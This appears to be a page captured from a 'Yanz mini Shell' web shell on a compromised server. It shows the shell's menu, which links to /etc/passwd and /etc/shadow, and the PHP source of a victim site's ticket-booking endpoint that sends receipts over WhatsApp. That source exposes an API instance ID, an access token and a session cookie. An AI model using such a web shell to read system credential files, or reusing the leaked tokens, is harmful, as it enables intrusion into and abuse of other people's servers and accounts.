Yanz mini Shell

Action

[*] New File
[*] New Folder

Sensitive File

[*] /etc/passwd
[*] /etc/shadow
[*] /etc/resolv.conf

<?php
header('Content-Type: application/json');
include '../../config/config.php'; // Adjust this path as needed

$inputData = json_decode(file_get_contents('php://input'), true);
error_log("Ticket booking request: " . json_encode($inputData));

// Extract & sanitize input
$name = isset($inputData['name']) ? trim($inputData['name']) : '';
$ticketType = isset($inputData['ticketType']) ? trim($inputData['ticketType']) : '';
$ticketQty = isset($inputData['ticketQty']) ? intval($inputData['ticketQty']) : 0;
$email = isset($inputData['email']) ? trim($inputData['email']) : 'admin@gmail.com';
$phone = isset($inputData['mobile']) ? trim($inputData['mobile']) : '';
$event_id = isset($inputData['event_id']) ? intval($inputData['event_id']) : 1;

$errors = [];
if ($name === '') $errors[] = "Name is required.";
if ($email === '') $errors[] = "Email is required.";
if ($phone === '') $errors[] = "Phone is required.";
if ($ticketQty <= 0) $errors[] = "Ticket quantity must be greater than zero.";
if ($event_id <= 0) $errors[] = "Invalid event ID.";

if (!empty($errors)) {
    echo json_encode(['success' => false, 'errors' => $errors]);
    exit;
}

try {
    // Step 1: Insert user
    $stmt = $pdo->prepare("INSERT INTO users (name, email, phone) VALUES (:name, :email, :phone)");
    $stmt->execute([
        ':name' => $name,
        ':email' => $email,
        ':phone' => $phone
    ]);
    $user_id = $pdo->lastInsertId();

// Step 2: Generate unique barcode
    function generateUniqueBarcode($pdo) {
        do {
            $barcode = str_pad(mt_rand(0, 99999999), 8, '0', STR_PAD_LEFT); // 8-digit number
            $stmt = $pdo->prepare("SELECT COUNT(*) FROM tickets WHERE barcode = :barcode");
            $stmt->execute([':barcode' => $barcode]);
            $count = $stmt->fetchColumn();
        } while ($count > 0);
        return $barcode;
    }

$barcode = generateUniqueBarcode($pdo);

// Step 3: Insert ticket
    $stmt = $pdo->prepare("INSERT INTO tickets (user_id, ticketQty, ticketType, event_id, barcode) 
                           VALUES (:user_id, :ticketQty, :ticketType, :event_id, :barcode)");
    $stmt->execute([
        ':user_id' => $user_id,
        ':ticketQty' => $ticketQty,
        ':ticketType' => $ticketType,
        ':event_id' => $event_id,
        ':barcode' => $barcode
    ]);
    $ticket_id = $pdo->lastInsertId();

// Step 4: Fetch event details
    // $stmt = $pdo->prepare("SELECT name AS event_name, location, event_date FROM events WHERE id = :id");
    // $stmt->execute([':id' => $event_id]);
    // $event = $stmt->fetch(PDO::FETCH_ASSOC);

$eventName = $event['event_name'] ?? 'SISMIA Star Nite';
    $eventLocation = $event['location'] ?? 'Kamarajar Arangam,Chennai.';
    $eventDate = $event['event_date'] ?? '28 June 2025';

// Step 5: Build confirmation receipt
    function generateEventReceipt($name, $email, $phone, $ticketType, $ticketQty, $eventName, $eventDate, $eventLocation, $barcode) {
        $qrCodeURL = "https://api.qrserver.com/v1/create-qr-code/?size=200x200&data=" . urlencode($barcode);

return "
🎟️ *Event Ticket Confirmation*
 
Hi *$name*,
 
Thank you for registering for *$eventName*! Your ticket(s) have been successfully booked.

📅 *Event:* $eventName  
📍 *Location:* $eventLocation  
🕒 *Date:* $eventDate

👤 *Name:* $name  
📞 *Phone:* $phone 
🎫 *Ticket Type:* $ticketType  
🔢 *Quantity:* $ticketQty

📌 *Your Barcode:*  
`$barcode`

🎫 Please present this barcode or QR at the event gate.

_See you there!_

– *Event Team*
";
    }

$receiptMessage = generateEventReceipt($name, $email, $phone, $ticketType, $ticketQty, $eventName, $eventDate, $eventLocation, $barcode);

// Step 6: Send via WhatsApp 
    $instance_id = "683DA078C37ED";
    $access_token = "683459ac0e7a7";
    $whatsapp_number = "91" . preg_replace('/\D/', '', $phone); // Ensure digits only

$whatsapp_url = "https://chatbot.bulkwaapi.in/api/send?number=$whatsapp_number&type=text&message=" . urlencode($receiptMessage) . "&instance_id=$instance_id&access_token=$access_token";

$curl = curl_init();
    curl_setopt_array($curl, array(
        CURLOPT_URL => $whatsapp_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_CUSTOMREQUEST => 'GET',
        CURLOPT_HTTPHEADER => array(
            'Cookie: stackpost_session=3mvr2k2pnnr59povf187lko7246oilv5'
        ),
    ));

$response = curl_exec($curl);
    curl_close($curl);
    $response_data = json_decode($response, true);

echo json_encode([
        'success' => true,
        'message' => 'Ticket booked and receipt sent via WhatsApp',
        'ticket_id' => $ticket_id,
        'barcode' => $barcode,
        'whatsapp_response' => $response_data
    ]);

} catch (Exception $e) {
    error_log("Ticket booking failed: " . $e->getMessage());
    echo json_encode([
        'success' => false,
        'message' => 'Failed to book ticket',
        'error' => $e->getMessage()
    ]);
}
?>